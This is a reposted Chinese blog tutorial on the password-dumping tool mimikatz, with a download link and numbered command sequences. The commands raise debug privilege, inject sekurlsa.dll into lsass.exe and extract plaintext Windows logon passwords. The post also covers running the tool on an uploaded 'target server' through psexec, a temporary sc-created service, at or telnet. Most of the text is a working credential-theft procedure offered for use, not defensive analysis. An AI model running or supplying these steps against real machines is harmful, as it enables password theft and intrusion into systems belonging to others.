介绍一下神器mimikatz,从lsass里抓密码

来源:互联网 发布:python 入门书籍 编辑:程序博客网 时间:2024/05/29 07:35

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,运行:

1//开始运行神器
2mimikatz
3//提升权限
4privilege::debug
5//注入dll
6inject::process lsass.exe sekurlsa.dll
7//抓取密码
8@getLogonPasswords


不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

这个咪咪卡住啦,支持

1Windows XP (部分可以)
2Windows Server 2003
3Windows Server 2008
4Windows Vista
5Windows 7
6Windows 7 SP1

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

1mimikatz_trunk\tools\PsExec.exe
2mimikatz_trunk\Win32\mimikatz.exe
3mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

1//最简单实用的方法,使用 PsExec.exe 启动。
2//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
3psexec -s cmd.exe
4//启动 mimikatz.exe
5C:\mimikatz_trunk\Win32\mimikatz.exe
6//提升权限
7privilege::debug
8//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
9inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
10//抓取密码
11@getLogonPasswords
12//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
13exit
14 
15//*********************************************************
16 
17//使用 At 启动
18at ***
19 
20//*********************************************************
21 
22//创建服务方法
23sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
24sc start getpassword
25sc delete getpassword
26 
27//*********************************************************
28 
29//telnet 远程命令管道
30telnet ****
本文标题:介绍一下神器mimikatz,从lsass里抓密码
本文链接:http://www.nigesb.com/introduction-of-mimikatz.html
订阅本站:http://www.nigesb.com/feed
写篇文章不容易,转载请注明来源,如果喜欢本站可以Feed订阅本站。
原创粉丝点击